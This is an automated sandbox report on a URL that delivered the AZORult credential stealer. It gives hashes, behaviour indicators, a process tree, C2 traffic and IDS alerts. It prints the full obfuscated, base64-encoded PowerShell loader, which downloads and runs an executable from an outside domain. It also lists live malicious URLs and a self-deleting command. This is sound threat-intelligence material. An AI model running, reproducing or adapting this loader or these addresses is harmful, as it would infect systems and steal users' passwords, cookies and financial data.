analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://91.90.195.48/dZRj3L

Full analysis: https://app.any.run/tasks/e1a0e8fd-4772-47de-9196-cc33cd491f59
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: May 23, 2019, 23:27:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
azorult
loader
evasion
Indicators:
MD5:

71EF13BB378B4EDE6BCCBFAD08222D9A

SHA1:

6DFEDF8A2015A5585E683457F70059F3F2087F36

SHA256:

3C1577C2D57091A0AC3722D0DCD3499C27405551D6C9F5C2459DAB6C90DABEC0

SSDEEP:

3:N1K0lH03PWp:C0lum

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • PcqYbgWA.tmp (PID: 3576)
      • PcqYbgWA.tmp (PID: 3184)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 932)
    • Connects to CnC server

      • PcqYbgWA.tmp (PID: 3184)
    • AZORULT was detected

      • PcqYbgWA.tmp (PID: 3184)
    • Actions looks like stealing of personal data

      • PcqYbgWA.tmp (PID: 3184)
    • Loads dropped or rewritten executable

      • PcqYbgWA.tmp (PID: 3184)
  • SUSPICIOUS

    • Executed via COM

      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3936)
    • Executes PowerShell scripts

      • iexplore.exe (PID: 3364)
    • Starts application with an unusual extension

      • PcqYbgWA.tmp (PID: 3576)
      • powershell.exe (PID: 932)
    • Reads Internet Cache Settings

      • PcqYbgWA.tmp (PID: 3184)
    • Executable content was dropped or overwritten

      • PcqYbgWA.tmp (PID: 3184)
      • powershell.exe (PID: 932)
    • Connects to server without host name

      • PcqYbgWA.tmp (PID: 3184)
    • Starts CMD.EXE for self-deleting

      • PcqYbgWA.tmp (PID: 3184)
    • Checks for external IP

      • PcqYbgWA.tmp (PID: 3184)
    • Reads the cookies of Google Chrome

      • PcqYbgWA.tmp (PID: 3184)
    • Starts CMD.EXE for commands execution

      • PcqYbgWA.tmp (PID: 3184)
    • Reads the cookies of Mozilla Firefox

      • PcqYbgWA.tmp (PID: 3184)
  • INFO

    • Reads internet explorer settings

      • iexplore.exe (PID: 3364)
      • iexplore.exe (PID: 3984)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3612)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3364)
      • iexplore.exe (PID: 3612)
      • iexplore.exe (PID: 3984)
    • Changes internet zones settings

      • iexplore.exe (PID: 3612)
    • Creates files in the user directory

      • iexplore.exe (PID: 3364)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3936)
    • Application launched itself

      • iexplore.exe (PID: 3612)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3612)
    • Changes settings of System certificates

      • iexplore.exe (PID: 3612)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs powershell.exe iexplore.exe csc.exe no specs cvtres.exe no specs pcqybgwa.tmp no specs #AZORULT pcqybgwa.tmp cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3612"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3364"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3612 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3936C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Version:
26,0,0,131
932powershell.exe -w hidden -noni -enc WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADEAaABiAG0ARgBuAFoAVwAxAGwAYgBuAFEAdQBRAFgAVgAwAGIAMgAxAGgAZABHAGwAdgBiAGkANQBCAGIAWABOAHAAVgBYAFIAcABiAEgATQA9ACcAKQApACkALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbABsAEkAbAAxADEAbABsAEkAewBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsAEkAMQAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsAGwAbAAxAEkAOwB9AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AVQBuAGkAYwBvAGQAZQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbABsADEAMQB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsADEAMQBJAGwAMQBJADEASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAEkASQBJAEkASQBsADEAMQBsADEAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsADEAbAAxAGwAbABsAEkASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJADEAbABJAEkAMQAxAGwASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAMQBsAEkASQAxAEkASQAxAGwASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQAxAEkASQBsAGwAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbAAxAEkASQBJAEkAMQBsAEkASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbAAxAEkAbABJADEAMQAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxADEASQBsAGwAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEAMQBsAGwASQBsADEAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQAxADEAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAAbAAxAGwASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAGwAbABJAEkAbABJADEAMQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBJAEkAbAAxADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbAAxAEkASQAxADEASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsADEASQBsAEkAMQBJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQBJADEASQBJAEkASQBsAEkAOwB9ADsAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGwAbABsADEASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQAxADEASQAxAEkALABzAHQAcgBpAG4AZwAgAEkAMQBJADEAbAAxACwASQBuAHQAUAB0AHIAIABJAGwAbABJAEkASQBsADEAMQAxACwASQBuAHQAUAB0AHIAIABsAGwASQBsADEASQAxADEAMQAsAGIAbwBvAGwAIABJAGwASQBsAGwAMQBJACwAdQBpAG4AdAAgAGwASQAxADEASQBsADEALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAbABsADEAbABsAGwASQAxACwAcwB0AHIAaQBuAGcAIABJAEkAMQAxAEkAMQBsADEALAByAGUAZgAgAGwAbABsADEAMQAgAEkAMQBJAGwAbAAxADEASQAsAG8AdQB0ACAAbABsAGwASQBsADEAMQBsAGwASQAgAEkAbABsAGwAbAAxAGwAbABJADEAKQA7AH0AIgA7ACQAbABsAEkAbAAxADEAbABsAGwAPQAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAEwAbwB3AFwAJAAoAC0AagBvAGkAbgAoACgANAA4AC4ALgA1ADcAKQArACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAOAB8ACUAewBbAGMAaABhAHIAXQAkAF8AfQApACkALgB0AG0AcAAiADsAJABJAEkAMQBJAGwAMQBsAGwAMQAxAGwAMQA9ACcAaAB0AHQAcAA6AC8ALwBjAHUAbgBuAGkAbgBnAHIAYQBjAG8AbwBuAC4AaQBuAGYAbwAvADQAZABEAFUALwBYAGwAVABZAC4AYwBmAG0AbAA/AEwAawBrAGUAVwAzAD0AOAA5ADgAMgAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBSAGsARQA1AFcAbABaAFAAZABFAEoAMwBRAGsAbAA0AFoARABoADYATQBpAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEUAbABKAE0AVQBsAHMATQBXAHgAcwBNAFQARgBzAE0AUwB3AGsAYgBHAHgASgBiAEQARQB4AGIARwB4AHMASwBUAHMAPQAnACkAKQB8AGkAZQB4ADsAJABsADEASQAxAGwASQBJAGwAbAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbAAxADEAOwAkAGwAMQBJADEAbABJAEkAbABsAC4AbAAxAGwASQAxAD0AMAB4ADAAOwAkAGwAMQBJADEAbABJAEkAbABsAC4ASQBsAGwAMQAxAEkAbAAxAEkAMQBJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAGwAMQBJADEAbABJAEkAbABsACkAOwAkAGwAbABJAGwASQAxAGwAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABsAGwASQBsADEAMQBsAGwASQA7AFsAbABsAGwAMQBJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAEkAbAAxADEAbABsAGwALAAkAGwAbABJAGwAMQAxAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAGwAMQBJADEAbABJAEkAbABsACwAWwByAGUAZgBdACQAbABsAEkAbABJADEAbAApAHwAbwB1AHQALQBuAHUAbABsADsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3984"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3612 CREDAT:6403C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2848"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\s-sxgvul.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
1812C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES30CD.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC30CC.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3576C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmpC:\Users\admin\AppData\LocalLow\PcqYbgWA.tmppowershell.exe
User:
admin
Integrity Level:
LOW
Exit code:
0
3184C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmpC:\Users\admin\AppData\LocalLow\PcqYbgWA.tmp
PcqYbgWA.tmp
User:
admin
Integrity Level:
LOW
Exit code:
0
2084"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PcqYbgWA.tmp"C:\Windows\system32\cmd.exePcqYbgWA.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
801
Read events
703
Write events
0
Delete events
0

Modification events

No data
Executable files
49
Suspicious files
0
Text files
22
Unknown types
26

Dropped files

PID
Process
Filename
Type
3612iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3612iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][1].txt
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0KZCO8Z5\uPmVz[1].txt
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O3L0JKC1\4231-nutrilite-manakin[1].jspx
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O3L0JKC1\1962_08_13[1].aspx
MD5:
SHA256:
3936FlashUtil32_26_0_0_131_ActiveX.exeC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx:Zone.Identifier
MD5:
SHA256:
3936FlashUtil32_26_0_0_131_ActiveX.exeC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][2].txttext
MD5:30056B659E9A27328BF9FA28F5F6088F
SHA256:9B56389C88BBB27B7243E4433E7ED95DCCC2A90C8FEDDB1510B0B764FCD4F7D5
3936FlashUtil32_26_0_0_131_ActiveX.exeC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.solsol
MD5:60E791F6E127B9C85B0CD1D4B814361A
SHA256:C650DA1E341EB6A2735D6F615FB8404EF349708E08E79AC164852076399233A8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
10
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3364
iexplore.exe
GET
302
91.90.195.48:80
http://91.90.195.48/dZRj3L
NL
unknown
932
powershell.exe
GET
200
68.183.179.105:80
http://cunningracoon.info/4dDU/XlTY.cfml?LkkeW3=8982
US
executable
150 Kb
suspicious
3184
PcqYbgWA.tmp
GET
200
185.194.141.58:80
http://ip-api.com/json
DE
text
321 b
shared
3184
PcqYbgWA.tmp
POST
200
217.8.117.16:80
http://217.8.117.16/3A38D670-F0E0-436D-8A00-FC71822F4632/index.php
unknown
text
2 b
malicious
3184
PcqYbgWA.tmp
POST
200
217.8.117.16:80
http://217.8.117.16/3A38D670-F0E0-436D-8A00-FC71822F4632/index.php
unknown
binary
4.27 Mb
malicious
3612
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3612
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3984
iexplore.exe
68.183.179.105:443
cunningracoon.info
DSL Extreme
US
suspicious
3184
PcqYbgWA.tmp
185.194.141.58:80
ip-api.com
netcup GmbH
DE
unknown
932
powershell.exe
68.183.179.105:80
cunningracoon.info
DSL Extreme
US
suspicious
3612
iexplore.exe
68.183.179.105:443
cunningracoon.info
DSL Extreme
US
suspicious
3184
PcqYbgWA.tmp
217.8.117.16:80
malicious
3364
iexplore.exe
68.183.179.105:443
cunningracoon.info
DSL Extreme
US
suspicious
3364
iexplore.exe
91.90.195.48:80
ITL Company
NL
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
cunningracoon.info
  • 68.183.179.105
suspicious
ip-api.com
  • 185.194.141.58
shared

Threats

PID
Process
Class
Message
932
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult.Stealer HTTP Header
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult Request
3184
PcqYbgWA.tmp
Potentially Bad Traffic
ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult Response
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult.Stealer HTTP Header
3184
PcqYbgWA.tmp
Potential Corporate Privacy Violation
ET POLICY External IP Lookup ip-api.com
3184
PcqYbgWA.tmp
Potentially Bad Traffic
ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
1 ETPRO signatures available at the full report
No debug info